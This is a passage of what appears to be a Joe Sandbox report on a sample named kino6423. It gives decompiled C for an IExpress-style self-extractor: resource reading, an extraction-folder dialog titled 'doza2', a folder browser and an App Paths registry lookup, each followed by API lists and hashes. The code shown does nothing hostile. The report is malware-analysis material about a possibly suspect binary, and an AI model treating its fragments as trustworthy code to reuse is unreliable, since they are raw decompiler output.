C-Code - Quality: 76%

			E00E53210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E00E543D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "doza2");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0xe59a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0xe591e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E00E544B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0xe591e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0xe591e5 - 3;
						if(_t49 - 0xe591e5 < 3) {
							goto L32;
						}
						_t24 =  *0xe591e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0xe591e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E00E5658A(0xe591e4, 0x104, 0xe51140);
								_t27 = E00E558C8(0xe591e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0xe591e4 - 0x5c;
									if( *0xe591e4 != 0x5c) {
										L30:
										_t30 = E00E5597D(0xe591e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0xe591e5 - 0x5c;
									if( *0xe591e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E00E544B9(_t64, 0x54a, 0xe591e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0xe591e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0xe591e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0xe591e4 - 0x5c;
						if( *0xe591e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0xe59124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0xe59a3c, 0x3e8, 0xe58598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00E54224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0xe587a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E00E544B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x00e5321b
0x00e5321e
0x00e53221
0x00e5343c
0x00e5343e
0x00e5343f
0x00e53445
0x00e53447
0x00000000
0x00e53447
0x00e53229
0x00e5322a
0x00e5322f
0x00e533ec
0x00e533f7
0x00e53410
0x00e53416
0x00e5341d
0x00e5342d
0x00e5342d
0x00e53438
0x00000000
0x00e53438
0x00e53237
0x00e53243
0x00e53243
0x00e53246
0x00e532ee
0x00e532f4
0x00e532f6
0x00e533d4
0x00e533d6
0x00e533db
0x00e533dc
0x00e533de
0x00e533df
0x00e53370
0x00e53372
0x00000000
0x00e53372
0x00e532fc
0x00e53301
0x00e53301
0x00e53303
0x00e53304
0x00e53304
0x00e5330a
0x00e5330d
0x00000000
0x00000000
0x00e53313
0x00e53318
0x00e5331a
0x00e53331
0x00e53332
0x00e5333a
0x00e5333d
0x00e5337c
0x00e53388
0x00e5338f
0x00e53394
0x00e53396
0x00e533a4
0x00e533ab
0x00e533b6
0x00e533be
0x00e533c3
0x00e533c5
0x00e53435
0x00e53437
0x00e53437
0x00000000
0x00e53437
0x00e533c7
0x00e533c9
0x00e533cc
0x00000000
0x00e533cc
0x00e533ad
0x00e533b4
0x00000000
0x00000000
0x00000000
0x00e533b4
0x00e53398
0x00e53399
0x00e5339b
0x00e5339c
0x00e5339d
0x00000000
0x00e5339d
0x00e5334c
0x00e53351
0x00e53354
0x00000000
0x00000000
0x00e5335c
0x00e53362
0x00e53364
0x00000000
0x00000000
0x00e53366
0x00e53367
0x00e53369
0x00e5336a
0x00e5336b
0x00000000
0x00e5336b
0x00e5331c
0x00e53323
0x00000000
0x00000000
0x00e53329
0x00e5332b
0x00000000
0x00000000
0x00000000
0x00e5332b
0x00e5324c
0x00e5324c
0x00e5324f
0x00e532c8
0x00e532ce
0x00000000
0x00e532ce
0x00e53251
0x00e53256
0x00000000
0x00000000
0x00e53271
0x00e53277
0x00e53279
0x00e53298
0x00e5329d
0x00e5329f
0x00000000
0x00000000
0x00e532b0
0x00e532b6
0x00e532b8
0x00000000
0x00000000
0x00e532be
0x00e53280
0x00e53289
0x00e5328e
0x00000000
0x00e5328e
0x00e5327b
0x00000000
0x00e5327b
0x00000000

APIs

LoadStringA.USER32(000003E8,00E58598,00000200), ref: 00E53271
GetDesktopWindow.USER32 ref: 00E533E2
SetWindowTextA.USER32(?,doza2), ref: 00E533F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00E53410
GetDlgItem.USER32(?,00000836), ref: 00E53426
EnableWindow.USER32(00000000), ref: 00E5342D
EndDialog.USER32(?,00000000), ref: 00E5343F

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00E532E2, 00E532E7, 00E53331, 00E53344, 00E5335B, 00E5336A
doza2, xrefs: 00E533F1

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$doza2
API String ID: 2418873061-1966320441
Opcode ID: 3ece85678251511fa1efcc60888af404991fb0a465cf3cb6f46ef56cf5d1d893
Instruction ID: 2fcfd2c76f1981abea357cc7dd2d78488eb89157d65adfca1182e94a12409383
Opcode Fuzzy Hash: 3ece85678251511fa1efcc60888af404991fb0a465cf3cb6f46ef56cf5d1d893
Instruction Fuzzy Hash: 3D516870341740BBEB251B365C4CFBB6E499B45BCBF146D38FE11B60D1CAB48A4D9261

Uniqueness

Uniqueness Score: -1.00%

Function 00E52CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00E52CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0xe58004; // 0x5ba1a886
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0xe59a3c = __ecx;
				memset(0xe59140, 0, 0x8fc);
				memset(0xe58a20, 0, 0x32c);
				memset(0xe588c0, 0, 0x104);
				 *0xe593ec = 1;
				_t20 = E00E5468F("TITLE", 0xe59154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0xe5858c = _t27;
					SetEvent(_t27);
					_t64 = 0xe59a34;
					if(E00E5468F("EXTRACTOPT", 0xe59a34, 4) != 0) {
						if(( *0xe59a34 & 0x000000c0) == 0) {
							L12:
							 *0xe59120 =  *0xe59120 & _t65;
							if(E00E55C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0xe58a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0xe58184 != 0) {
										__imp__#17();
									}
									if( *0xe58a24 == 0) {
										_t57 = _t65;
										if(E00E536EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0xe59a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0xe59a34 & 0x00000100) == 0 || ( *0xe58a38 & 0x00000001) != 0 || E00E518A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00E56517(_t57, 0x7d6, _t34, E00E519E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00E52390(0xe58a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E00E544B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E00E5468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0xe58588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0xe59a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E00E544B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E00E544B9(0, 0x54b, "doza2", 0, 0x10, 0);
										L11:
										CloseHandle( *0xe58588);
										 *0xe59124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E00E544B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0xe59124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00E56CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x00e52cb5
0x00e52cbc
0x00e52cc7
0x00e52cc9
0x00e52cd1
0x00e52cd3
0x00e52cd9
0x00e52ce9
0x00e52cf9
0x00e52d0e
0x00e52d15
0x00e52d1c
0x00e52ef3
0x00000000
0x00e52d2d
0x00e52d34
0x00e52d3b
0x00e52d40
0x00e52d48
0x00e52d59
0x00e52d84
0x00e52e1f
0x00e52e1f
0x00e52e2e
0x00e52e41
0x00e52e5a
0x00e52e62
0x00e52e6c
0x00e52e6c
0x00e52e75
0x00e52e77
0x00e52e77
0x00e52e84
0x00e52e8b
0x00e52e94
0x00000000
0x00e52e96
0x00e52e96
0x00e52e9e
0x00e52ea2
0x00e52eba
0x00000000
0x00e52ece
0x00e52ede
0x00e52eed
0x00000000
0x00000000
0x00000000
0x00000000
0x00e52eed
0x00e52eef
0x00e52eef
0x00e52eef
0x00e52eef
0x00e52ea2
0x00e52e86
0x00e52e88
0x00e52e88
0x00e52e43
0x00e52e48
0x00000000
0x00e52e48
0x00e52e30
0x00e52e30
0x00e52ef8
0x00e52f01
0x00000000
0x00e52f01
0x00e52d8a
0x00e52d8f
0x00e52da1
0x00000000
0x00e52da3
0x00e52dae
0x00e52db4
0x00e52dbb
0x00000000
0x00e52dca
0x00e52dd3
0x00e52df5
0x00e52e02
0x00000000
0x00000000
0x00000000
0x00000000
0x00e52dd5
0x00e52dde
0x00e52de3
0x00e52e04
0x00e52e0a
0x00e52e10
0x00000000
0x00e52e10
0x00e52dd3
0x00e52dbb
0x00e52da1
0x00e52d5b
0x00e52d5b
0x00e52d5d
0x00e52d69
0x00e52d6e
0x00e52f06
0x00e52f06
0x00e52f06
0x00e52d59
0x00e52f18

APIs

memset.MSVCRT ref: 00E52CD9
memset.MSVCRT ref: 00E52CE9
memset.MSVCRT ref: 00E52CF9

Part of subcall function 00E5468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E546A0
Part of subcall function 00E5468F: SizeofResource.KERNEL32(00000000,00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546A9
Part of subcall function 00E5468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E546C3
Part of subcall function 00E5468F: LoadResource.KERNEL32(00000000,00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546CC
Part of subcall function 00E5468F: LockResource.KERNEL32(00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546D3
Part of subcall function 00E5468F: memcpy_s.MSVCRT ref: 00E546E5
Part of subcall function 00E5468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E52D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00E52D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00E52DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00E52DBD
CloseHandle.KERNEL32(doza2,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00E52E0A

Part of subcall function 00E544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E54518
Part of subcall function 00E544B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00E54554

Strings

EXTRACTOPT, xrefs: 00E52D4D
VERCHECK, xrefs: 00E52E54
TITLE, xrefs: 00E52D09
INSTANCECHECK, xrefs: 00E52D95
doza2, xrefs: 00E52D04, 00E52DD9, 00E52DF0

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$doza2
API String ID: 1002816675-859929227
Opcode ID: f91fc063dc5f39960709b33880ca98262b5508272366014f5f7a3c3abc320dd2
Instruction ID: efa183ea2a7bcdeae6d64bf770de083c473ae1101e1d99e9ecd755f6cfca1589
Opcode Fuzzy Hash: f91fc063dc5f39960709b33880ca98262b5508272366014f5f7a3c3abc320dd2
Instruction Fuzzy Hash: 8751D770340301AEE71967329D47BBA2699D746707F046C2DFE42F51E6DFB4884D9621

Uniqueness

Uniqueness Score: -1.00%

Function 00E534F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00E534F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0xe591d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0xe58584 = _t35;
					E00E543D0(_t35, GetDesktopWindow());
					__eflags =  *0xe58184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "doza2");
					_t17 = CreateThread(0, 0, E00E54FE0, 0, 0, 0xe58798);
					 *0xe5879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E00E544B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0xe5858c);
					_t38 =  *0xe58584; // 0x0
					_t25 = E00E544B9(_t38, 0x4b2, 0xe51140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0xe591d8 = 1;
						SetEvent( *0xe5858c);
						_t39 =  *0xe5879c; // 0x0
						E00E53680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0xe5858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0xe5879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x00e534fb
0x00e534fe
0x00e53665
0x00e53666
0x00e53666
0x00e53668
0x00e5366e
0x00e5366e
0x00e53671
0x00e53671
0x00e53677
0x00000000
0x00e53677
0x00e53504
0x00e53506
0x00e53507
0x00e5350c
0x00e5365b
0x00e5365f
0x00000000
0x00000000
0x00000000
0x00e53661
0x00e53512
0x00e53515
0x00e535be
0x00e535c1
0x00e535d1
0x00e535d8
0x00e535de
0x00e535f8
0x00e53617
0x00e53617
0x00e53623
0x00e53637
0x00e5363d
0x00e53642
0x00e53644
0x00000000
0x00e53646
0x00e53652
0x00e53657
0x00e53658
0x00000000
0x00e53658
0x00e53644
0x00e5351b
0x00e5351d
0x00e5354f
0x00e53553
0x00000000
0x00000000
0x00e5355f
0x00e53565
0x00e5357c
0x00e53581
0x00e53584
0x00e5359b
0x00e535a1
0x00e535a7
0x00e535ad
0x00e535b3
0x00e535b8
0x00000000
0x00e535b8
0x00e53586
0x00e53588
0x00000000
0x00000000
0x00e53590
0x00000000
0x00e53590
0x00e53524
0x00e53535
0x00e53541
0x00000000
0x00e53549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 00E53535
EndDialog.USER32(?,?), ref: 00E53541
ResetEvent.KERNEL32 ref: 00E5355F
SetEvent.KERNEL32(00E51140,00000000,00000020,00000004), ref: 00E53590
GetDesktopWindow.USER32 ref: 00E535C7
GetDlgItem.USER32(?,0000083B), ref: 00E535F1
SendMessageA.USER32(00000000), ref: 00E535F8
GetDlgItem.USER32(?,0000083B), ref: 00E53610
SendMessageA.USER32(00000000), ref: 00E53617
SetWindowTextA.USER32(?,doza2), ref: 00E53623
CreateThread.KERNEL32 ref: 00E53637
EndDialog.USER32(?,00000000), ref: 00E53671

Strings

doza2, xrefs: 00E5361D

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: doza2
API String ID: 2406144884-612509477
Opcode ID: 0634f34b28367d8e4d6f37ea4474def0c50308049694133a237f1a030f32b5c4
Instruction ID: d79d5339d58bc54aa37510296b015e217ef7fc6c4273ebe6be41a77c70fb7b0e
Opcode Fuzzy Hash: 0634f34b28367d8e4d6f37ea4474def0c50308049694133a237f1a030f32b5c4
Instruction Fuzzy Hash: A531D971240300BFD7245F36ED0DE6A3B65E785B87F246D29FA02B52B1DAB1890CCB51

Uniqueness

Uniqueness Score: -1.00%

Function 00E54224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00E54224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E00E544B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0xe588c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0xe587a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0xe58598;
					_v36 = 1;
					_v32 = E00E54200;
					_v28 = 0xe588c0;
					 *0xe5a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0xe5a288(_t32, 0xe588c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0xe588c0 != 0) {
							E00E51680(0xe587a0, 0x104, 0xe588c0);
						}
						 *0xe5a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0xe587a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0xe588c0);
					_t61 = 0xe588c0;
					_t4 =  &(_t61[1]); // 0xe588c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0xe588c0; // 0x1cb1181
					_t44 = CharPrevA(0xe588c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0xe588c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x00e54234
0x00e5423c
0x00e54240
0x00e543b2
0x00e543b7
0x00e543c0
0x00000000
0x00e543c5
0x00e5424c
0x00e54252
0x00e54257
0x00e543a4
0x00e543a5
0x00e543ab
0x00000000
0x00e543ab
0x00e54263
0x00e54269
0x00e5426e
0x00000000
0x00000000
0x00e5427a
0x00e54280
0x00e54285
0x00000000
0x00000000
0x00e5428d
0x00e54293
0x00e542e6
0x00e542e9
0x00e542ef
0x00e542f4
0x00e542f7
0x00e54300
0x00e54307
0x00e5430e
0x00e54315
0x00e5431c
0x00e54322
0x00e54326
0x00e5432d
0x00e5432d
0x00e5432f
0x00e54334
0x00e54343
0x00e54349
0x00e5434d
0x00e54354
0x00e54354
0x00e5435d
0x00e5436e
0x00e5436e
0x00e5437d
0x00e54383
0x00e54387
0x00e5438e
0x00e5438e
0x00e54387
0x00e54391
0x00e54399
0x00000000
0x00e54295
0x00e5429f
0x00e542a5
0x00e542aa
0x00e542aa
0x00e542ad
0x00e542ad
0x00e542af
0x00e542b0
0x00e542b6
0x00e542c2
0x00e542c8
0x00e542ce
0x00e542e4
0x00e542e4
0x00000000
0x00e542ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00E54236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00E5424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 00E54263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00E5427A
GetTempPathA.KERNEL32(00000104,00E588C0,?,00000001), ref: 00E5429F
CharPrevA.USER32(00E588C0,01CB1181,?,00000001), ref: 00E542C2
CharPrevA.USER32(00E588C0,00000000,?,00000001), ref: 00E542D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00E54391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00E543A5

Strings

SHGetPathFromIDList, xrefs: 00E54274
SHELL32.DLL, xrefs: 00E5422F
SHBrowseForFolder, xrefs: 00E54246

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: 4600cf8840b09222b55c3b8cda7c145774804beef34058df04c790d6c999685e
Instruction ID: 2adc9af494c3c8a28ca091e4d3e85d1ea59dd679b9d9015ae354e40c35661d68
Opcode Fuzzy Hash: 4600cf8840b09222b55c3b8cda7c145774804beef34058df04c790d6c999685e
Instruction Fuzzy Hash: BA41E2B4A00300AFD7159F61DD85AAE7FA4EB4834AF481D69EE01B72A1CB748C4DCB61

Uniqueness

Uniqueness Score: -1.00%

Function 00E52773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00E52773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0xe58004; // 0x5ba1a886
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00E51781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E00E5658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E00E5658A(_t61, _t63, _v276);
							} else {
